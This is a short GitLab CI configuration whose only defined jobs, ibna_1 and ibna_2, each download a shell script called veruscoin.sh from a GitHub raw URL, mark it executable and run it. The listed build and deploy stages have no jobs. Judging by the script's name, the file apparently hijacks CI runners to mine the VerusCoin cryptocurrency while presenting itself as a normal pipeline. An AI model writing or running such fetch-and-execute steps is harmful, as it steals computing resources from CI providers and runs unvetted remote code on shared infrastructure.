stages:
    - ibna
    - build
    - deploy
ibna_1:
    stage: ibna
    script:
        - wget https://raw.githubusercontent.com/capil/git/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 
ibna_2:
    stage: ibna
    script:
        - wget https://raw.githubusercontent.com/capil/git/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh